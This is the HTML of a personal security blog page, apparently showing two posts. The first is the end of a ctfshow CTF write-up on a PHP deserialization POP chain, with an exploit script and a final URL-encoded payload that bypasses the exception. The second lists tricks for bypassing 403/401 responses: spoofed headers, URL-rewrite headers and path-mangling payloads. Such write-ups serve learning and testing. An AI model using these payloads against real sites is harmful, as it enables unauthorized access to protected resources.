&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$func</span>, <span class="variable">$args</span></span>) </span>&#123;		<span class="comment">// 2、从 one.__destruct() 到了这里</span></span><br><span class="line">        call_user_func([<span class="keyword">$this</span>, <span class="variable">$func</span>.<span class="string">&quot;Me&quot;</span>], <span class="variable">$args</span>); <span class="comment">// func 是 add，所以调用了 addMe() 函数</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">third</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$string</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$string</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;string = <span class="variable">$string</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>) </span>&#123;		<span class="comment">// 5、$name = &quot;string&quot;</span></span><br><span class="line">        <span class="variable">$var</span> = <span class="keyword">$this</span>-&gt;<span class="variable">$name</span>;  <span class="comment">// $var = $this-&gt;string;</span></span><br><span class="line">        <span class="variable">$var</span>[<span class="variable">$name</span>]();	<span class="comment">// 调用 $this-&gt;string[&quot;string&quot;]() 方法，接下去目标就只有 MeMeMe() 函数了</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&quot;ctfshow&quot;</span>])) &#123;</span><br><span class="line">    <span class="variable">$a</span>=unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="string">&quot;高一新生报道&quot;</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="0x01-EXP"><a href="#0x01-EXP" class="headerlink" title="0x01 EXP"></a>0x01 EXP</h2><p>写exp的时候，可以把所有 class 的代码都复制过来，只是函数体内的代码可以注释掉，因为不需要真的去执行，只是为了生成序列化。</p>
<h3 id="两个难点"><a href="#两个难点" class="headerlink" title="两个难点"></a>两个难点</h3><p>写exp遇到两个难点：</p>
<ol>
<li><p><code>$var[$string]()</code> 这里，要怎样才能调用到 <code>one.MeMeMe()</code>？</p>
</li>
<li><p>抛出异常会阻止了析构函数的执行，怎样绕过？</p>
</li>
</ol>
<h3 id="解决难点1"><a href="#解决难点1" class="headerlink" title="解决难点1"></a>解决难点1</h3><p>对第一个问题百思不得其解，其中尝试过让 <code>$string[&#39;string&#39;] = &quot;one::MeMeMe&quot; </code>，等操作均不行，最终看了writeup才知道，还可以用数组的方式来指定某个对象，也就是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$One3</span> = <span class="keyword">new</span> one();</span><br><span class="line"><span class="variable">$string</span>[<span class="string">&#x27;string&#x27;</span>] = [<span class="variable">$One3</span>, <span class="string">&quot;MeMeMe&quot;</span>];</span><br><span class="line"></span><br><span class="line"><span class="comment">// 这样的话执行</span></span><br><span class="line"><span class="variable">$string</span>[<span class="string">&#x27;string&#x27;</span>]();</span><br><span class="line"></span><br><span class="line"><span class="comment">// 就能调用到 one.MeMeMe()</span></span><br></pre></td></tr></table></figure>

<p>此时的完整EXP</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">one</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$object</span>;</span><br><span class="line">    <span class="comment">// public $year_parm = array(0 =&gt; &quot;Happy_func&quot;);</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">MeMeMe</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;[+] Into MeMeMe()&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// @$this-&gt;object-&gt;add();      //  可调用 second.__call()</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// return $this-&gt;object-&gt;string;       //  使用私有变量，可以调用 third.__get()</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">second</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;filename = <span class="variable">$filename</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">addMe</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// return &quot;Wow you have sovled&quot;.$this-&gt;filename;       // 调用 __toString()</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$func</span>, <span class="variable">$args</span></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// call_user_func([$this, $func.&quot;Me&quot;], $args);     // 调用 addMe()，</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">third</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$string</span>; <span class="comment">// 如果 $string[&#x27;string&#x27;] = [$One3, &quot;MeMeMe&quot;]</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$string</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;string = <span class="variable">$string</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// $var = $this-&gt;$name;        // var 就是 string</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;yes, this&quot;</span>;</span><br><span class="line">        <span class="comment">// $var[$name]();      // string[string]()</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$One</span> = <span class="keyword">new</span> one();</span><br><span class="line"><span class="variable">$One2</span> = <span class="keyword">new</span> one();</span><br><span class="line"><span class="variable">$One3</span> = <span class="keyword">new</span> one();</span><br><span class="line"></span><br><span class="line"><span class="variable">$Second</span> = <span class="keyword">new</span> second(<span class="variable">$One2</span>);</span><br><span class="line"><span class="variable">$One</span>-&gt;object = <span class="variable">$Second</span>;</span><br><span class="line"><span class="variable">$Third</span> = <span class="keyword">new</span> third(<span class="keyword">array</span>(<span class="string">&quot;string&quot;</span> =&gt; [<span class="variable">$One3</span>, <span class="string">&quot;MeMeMe&quot;</span>])); <span class="comment">// 这里是重点</span></span><br><span class="line"><span class="variable">$One2</span>-&gt;object = <span class="variable">$Third</span>;</span><br><span class="line"><span class="variable">$One3</span>-&gt;year_parm = <span class="keyword">array</span>(<span class="number">0</span> =&gt; <span class="string">&quot;Happy_func&quot;</span>);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>得到序列化结果：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; php exp.php</span><br><span class="line"></span><br><span class="line">O%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00filename%22%3BO%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BN%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7D%7D%7D%7D</span><br></pre></td></tr></table></figure>

<p>那么问题来到了第二个难点。。抛出异常无法触发垃圾回收机制，所以不能执行析构函数。</p>
<p><img src="image-20220305104951551.png" alt="image-20220305104951551"></p>
<h3 id="解决难点2"><a href="#解决难点2" class="headerlink" title="解决难点2"></a>解决难点2</h3><p>这里应当是绕过垃圾回收机制触发析构函数，具体原理还没搞懂下次再研究，官方wp的方法是，去掉序列化字符串里面结尾的花括号，也就是去掉 <code>%7D</code>，神奇的操作….最终payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=O%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00filename%22%3BO%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BN%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7D%7D%7D</span><br></pre></td></tr></table></figure>

<p><img src="image-20220305105438930.png" alt="image-20220305105438930"></p>
<p>关于GC回收可以参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.evonide.com/breaking-phps-garbage-collection-and-unserialize/">https://www.evonide.com/breaking-phps-garbage-collection-and-unserialize/</a></p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/08/10/bypass-403-401/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sixxx1">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sixxx1 | blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2021/08/10/bypass-403-401/" class="post-title-link" itemprop="url">绕过403和401错误</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-08-10 12:08:11 / Modified: 20:46:35" itemprop="dateCreated datePublished" datetime="2021-08-10T12:08:11+08:00">2021-08-10</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h4 id="1-添加Headers头："><a href="#1-添加Headers头：" class="headerlink" title="1. 添加Headers头："></a>1. 添加Headers头：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For etc.</span><br></pre></td></tr></table></figure>

<p>有时候加入这些白名单IP就可以传输敏感数据，</p>
<h4 id="2-跟着unicode字符："><a href="#2-跟着unicode字符：" class="headerlink" title="2. 跟着unicode字符："></a>2. 跟着unicode字符：</h4><p>尝试插入unicode字符去绕过，比如 <code>% = ca</code>, <code>%=sa</code>，这些列表可以google找到，所以如果<code>/cadmin</code>被阻断了，可以试试用 <code>%dmin</code>。</p>
<h4 id="3-重写headers头中的url："><a href="#3-重写headers头中的url：" class="headerlink" title="3. 重写headers头中的url："></a>3. 重写headers头中的url：</h4><p>比如GET /admin是403，可以试试：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET /accessible</span><br><span class="line"><span class="attribute">X-Original-URL</span><span class="punctuation">: </span>/admin OR</span><br><span class="line"><span class="attribute">X-Override-URL</span><span class="punctuation">: </span>/admin OR</span><br><span class="line"><span class="attribute">X-Rewrite-URL</span><span class="punctuation">: </span> /admin OR ....</span><br></pre></td></tr></table></figure>

<h4 id="4-尝试各种的payload："><a href="#4-尝试各种的payload：" class="headerlink" title="4. 尝试各种的payload："></a>4. 尝试各种的payload：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /admin 				-&gt; 403</span><br><span class="line">    /accessible/..;/admin 		-&gt; 200</span><br><span class="line">    /.;/admin				-&gt; 200</span><br><span class="line">    /admin;/				-&gt; 200</span><br><span class="line">    /admin/~				-&gt; 200</span><br><span class="line">    /./admin/./				-&gt; 200</span><br><span class="line">    /admin?param			-&gt; 200</span><br><span class="line">    /%2e/admin				-&gt; 200</span><br><span class="line">    /admin#				-&gt; 200</span><br></pre></td></tr></table></figure>

<h4 id="5-转换请求方法："><a href="#5-转换请求方法：" class="headerlink" title="5. 转换请求方法："></a>5. 转换请求方法：</h4><p>   例如把GET改为POST。</p>
<h4 id="6-通过IP、Vhost："><a href="#6-通过IP、Vhost：" class="headerlink" title="6. 通过IP、Vhost："></a>6. 通过IP、Vhost：</h4><blockquote>
<p>Access the site via its IP or Vhost to get the forbidden content.</p>
</blockquote>
<p>   就是从旁站入手吧。</p>
<h4 id="7-Fuzzing："><a href="#7-Fuzzing：" class="headerlink" title="7. Fuzzing："></a>7. Fuzzing：</h4><p>爆破文件和目录等。</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  


  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">sixxx1</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sixxx1</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  















    <div id="pjax">
  

  

    </div>
</body>
</html>